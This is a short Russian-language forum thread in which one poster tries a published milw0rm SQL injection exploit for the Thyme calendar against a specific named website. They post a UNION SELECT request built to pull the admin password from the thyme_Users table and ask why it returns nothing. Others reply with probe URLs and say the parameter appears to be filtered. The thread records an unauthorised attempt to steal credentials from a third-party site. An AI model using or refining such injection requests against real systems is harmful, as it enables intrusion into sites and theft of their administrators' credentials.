В общем вот такой сайт
hxxp://www.ypsielbow.com/thyme/
нашел багу под календарь
hxxp://www.milw0rm.com/exploits/3895, но толи я не правильно понял толи что-т с багой не так, но когда делаю запрос
http://www.ypsielbow.com/thyme/event_view.php?eid=34%20UNION%20SELECT%20pass%20FR OM%20thyme_Users%20WHERE%20username%20=%20%22admin %22
Но в коде страницы ничего нету =(

The vulnerability exists in event_view.php, because the 'eid' field is not
properly
validated. An attacker could exploit the vulnerabilit with the following
request:
Походил ещё по паре календарей, везде параметры фильтруются. Милворм врёт?

Нету там скули..
http://www.ypsielbow.com/thyme/event_view.php?eid=35-1
http://www.ypsielbow.com/thyme/event_view.php?eid=34

Isis
и такое чувство что ее нигде нет...просто я тоже подумал что может пропатчено, но посмотрел еще 3-4 сайта тот-же результат.